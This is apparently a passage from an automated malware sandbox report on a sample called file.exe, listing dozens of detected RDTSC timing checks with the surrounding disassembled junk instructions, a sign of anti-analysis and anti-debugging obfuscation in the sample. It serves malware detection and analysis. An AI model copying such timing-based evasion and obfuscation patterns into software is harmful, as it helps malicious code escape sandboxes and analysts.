              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801A64 second address: 801A69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801A69 second address: 801A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1981 second address: 8A198B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B6E second address: 8A1B8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEF0C74E735h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FEF0C74E726h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B8F second address: 8A1BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FEF0C6C7656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BA3 second address: 8A1BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BA7 second address: 8A1BAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D01 second address: 8A1D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D0D second address: 8A1D19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D19 second address: 8A1D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E739h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A30E3 second address: 8A3134 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEF0C6C7666h 0x0000000e jmp 00007FEF0C6C7669h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEF0C6C7667h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3470 second address: 8A3482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007FEF0C74E726h 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8EA6 second address: 8A8EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACCAD second address: 8ACCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACCB1 second address: 8ACCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7661h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FEF0C6C7656h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEEE second address: 7FFEF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEF3 second address: 7FFEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEF9 second address: 7FFF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FEF0C74E731h 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF6F second address: 8ABF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF75 second address: 8ABF8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E72Fh 0x00000007 jno 00007FEF0C74E726h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF8E second address: 8ABF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF9E second address: 8ABFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABFA2 second address: 8ABFCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEF0C6C7668h 0x00000011 jg 00007FEF0C6C7666h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABFCE second address: 8ABFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E72Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC3E3 second address: 8AC3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Ch 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC529 second address: 8AC554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E734h 0x00000007 jmp 00007FEF0C74E733h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC554 second address: 8AC55E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C6C765Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC6CD second address: 8AC6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC83F second address: 8AC845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC845 second address: 8AC84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B29CA second address: 8B29E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEF0C6C7662h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B3436 second address: 8B343B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43B1 second address: 8B43C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEF0C6C765Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43C2 second address: 8B43CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD290 second address: 8BD2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2A5 second address: 8BD2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2AB second address: 8BD2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2AF second address: 8BD2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FEF0C74E728h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEF0C74E731h 0x00000018 jno 00007FEF0C74E726h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCCAE second address: 8BCCC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FEF0C6C765Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCCC4 second address: 8BCCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C74E732h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCE84 second address: 8CCE8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCE8A second address: 8CCE94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E64 second address: 8D2E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E6A second address: 8D2E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E730h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E7E second address: 8D2E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E82 second address: 8D2E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA00D second address: 8DA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA013 second address: 8DA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA01B second address: 8DA021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806CF3 second address: 806D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FEF0C74E72Ah 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E380A second address: 8E380E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E380E second address: 8E382D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEF0C74E72Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E382D second address: 8E3841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7660h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3841 second address: 8E385E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E385E second address: 8E3878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FEF0C6C7656h 0x0000000b jmp 00007FEF0C6C765Bh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E3878 second address: 8E387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E218C second address: 8E2194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E22E3 second address: 8E2313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E730h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FEF0C74E733h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E2313 second address: 8E231C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E231C second address: 8E2322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E2322 second address: 8E2326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E270A second address: 8E270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E2AE5 second address: 8E2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E4E49 second address: 8E4E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E737h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FEF0C74E735h 0x00000015 pop ecx 0x00000016 jmp 00007FEF0C74E72Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E9209 second address: 8E920D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E920D second address: 8E923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007FEF0C74E733h 0x0000000f push edi 0x00000010 jmp 00007FEF0C74E72Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E923C second address: 8E9249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FEF0C6C7674h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E93B0 second address: 8E93B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E93B6 second address: 8E93DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FEF0C6C7656h 0x00000010 jmp 00007FEF0C6C7668h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F64E4 second address: 8F64E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F64E8 second address: 8F64EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 808834 second address: 80886F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FEF0C74E738h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEF0C74E736h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80886F second address: 80887E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80887E second address: 808884 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 906B5D second address: 906B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 906B62 second address: 906B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007FEF0C74E726h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 906B71 second address: 906B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9089D0 second address: 9089ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C74E732h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91F493 second address: 91F497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9231D5 second address: 9231EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEF0C74E726h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9231EA second address: 9231EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9231EE second address: 9231FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E726h 0x00000008 je 00007FEF0C74E726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925A98 second address: 925AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEF0C6C7656h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925F5F second address: 925FBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007FEF0C74E726h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D33F4h], edi 0x00000013 push dword ptr [ebp+122D1A42h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FEF0C74E728h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov edx, ecx 0x00000035 mov dx, 5700h 0x00000039 call 00007FEF0C74E729h 0x0000003e pushad 0x0000003f jng 00007FEF0C74E728h 0x00000045 pushad 0x00000046 popad 0x00000047 push ebx 0x00000048 push esi 0x00000049 pop esi 0x0000004a pop ebx 0x0000004b popad 0x0000004c push eax 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pop eax 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9271F3 second address: 927226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 jmp 00007FEF0C6C7669h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92A9EC second address: 92A9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB022E second address: 4FB0287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FEF0C6C7664h 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007FEF0C6C7663h 0x0000001c movzx ecx, dx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FEF0C6C765Ch 0x00000029 mov eax, 5526E961h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB0300 second address: 4FB033A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEF0C74E731h 0x00000009 adc ecx, 51452206h 0x0000000f jmp 00007FEF0C74E731h 0x00000014 popfd 0x00000015 mov ecx, 197629B7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB033A second address: 4FB0364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 mov eax, 2D2EEEA7h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, 5FACC2BBh 0x00000018 call 00007FEF0C6C7660h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB0364 second address: 4FB03A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEF0C74E730h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov cl, E0h 0x00000014 mov ecx, edx 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEF0C74E730h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB03A4 second address: 4FB03AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB03AA second address: 4FB03AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845DD3 second address: 845DD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845FB8 second address: 845FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
